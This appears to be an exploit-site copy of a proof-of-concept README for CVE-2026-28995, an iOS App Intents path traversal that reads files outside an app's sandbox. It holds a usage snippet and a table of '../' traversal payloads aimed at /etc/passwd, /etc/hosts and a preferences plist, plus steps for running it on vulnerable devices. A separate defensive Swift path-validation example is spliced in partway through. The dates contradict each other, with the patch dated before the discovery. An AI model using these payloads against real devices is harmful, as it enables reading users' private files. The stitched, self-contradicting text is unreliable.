## https://sploitus.com/exploit?id=5E384957-8285-5247-95CE-C7384C91A926
# CVE-2026-28995

**Proof of Concept for CVE-2026-28995**: Path Traversal vulnerability in App Intents on iOS 26.4.2 and below.

## Description

This vulnerability allows a malicious app to **read any file** outside its sandbox via App Intents. The root cause is insufficient path validation in Apple's App Intents framework.

**Affected versions:** iOS 26.4.2 and below  
**Patched in:** iOS 26.5 (May 11, 2026)
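
For defenders, the kind of path validation whose absence the description names as the root cause, as an added example (not code from this repository and not Apple's fix). `resolveContained`, `PathError` and the temporary base directory are hypothetical names chosen for illustration.

```swift
import Foundation

// Hypothetical names throughout; not Apple's fix and not code from this PoC.
enum PathError: Error { case outsideBase }

/// Resolve `untrusted` against `base` and reject any result that leaves `base`.
func resolveContained(_ untrusted: String, under base: URL) throws -> URL {
    // Canonicalize both sides the same way: collapse "." and "..", follow symlinks.
    let root = base.standardizedFileURL.resolvingSymlinksInPath()
    let candidate = root.appendingPathComponent(untrusted)
        .standardizedFileURL
        .resolvingSymlinksInPath()

    // Compare whole path components, so "/base-evil" never passes as "/base".
    let rootParts = root.pathComponents
    let candParts = candidate.pathComponents
    guard candParts.count >= rootParts.count,
          Array(candParts.prefix(rootParts.count)) == rootParts else {
        throw PathError.outsideBase
    }
    return candidate
}

// Constructed demo: a throwaway base directory holding one file.
let base = FileManager.default.temporaryDirectory
    .appendingPathComponent("intent-demo-\(UUID().uuidString)")
try FileManager.default.createDirectory(at: base, withIntermediateDirectories: true)
try "hello".write(to: base.appendingPathComponent("notes.txt"),
                  atomically: true, encoding: .utf8)
// A symlink inside the base that points outside it.
try FileManager.default.createSymbolicLink(
    at: base.appendingPathComponent("link"),
    withDestinationURL: URL(fileURLWithPath: "/etc"))

let inputs = [
    "notes.txt",
    "sub/../notes.txt",
    "../../../../../../../../../../../../../etc/passwd",
    "link/hosts",
]
for input in inputs {
    do {
        let url = try resolveContained(input, under: base)
        print("ALLOW \(input) -> \(url.path)")
    } catch {
        print("DENY  \(input)")
    }
}
```

The caller should open the returned URL rather than the original string, since the check applies only to the canonical form it validated.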

## Usage

### 1. Function `readCve(path: String) -> String`

```swift
let intent = CVE_2026_28995()
let content = intent.readCve(path: "../../../../../../../../../../../../../etc/passwd")
print(content)
```
### 2. Path Examples

| Path | Reads |
| --- | --- |
| `../../../../../../../../../../../../../etc/passwd` | User passwords |
| `../../../../../../../../../../../../../etc/hosts` | Hosts file |
| `../../../../../../../../../../../../../var/mobile/Library/Preferences/.GlobalPreferences.plist` | System preferences |

### 3. Directory Handling

If the path points to a directory, the function returns:

```
[DIRECTORY]
Contents:
file1.txt
file2.jpg
folder/
```

## How to Run

1. Create an iOS project in Xcode.
2. Add `CVE-2026-28995.swift` to the project.
3. Call `readCve(path:)` with the target path.
4. Run on iOS 26.4.2 or earlier.

## Responsible Disclosure

**Discovered:** July 1, 2026  
**Patched in:** iOS 26.5 (May 11, 2026)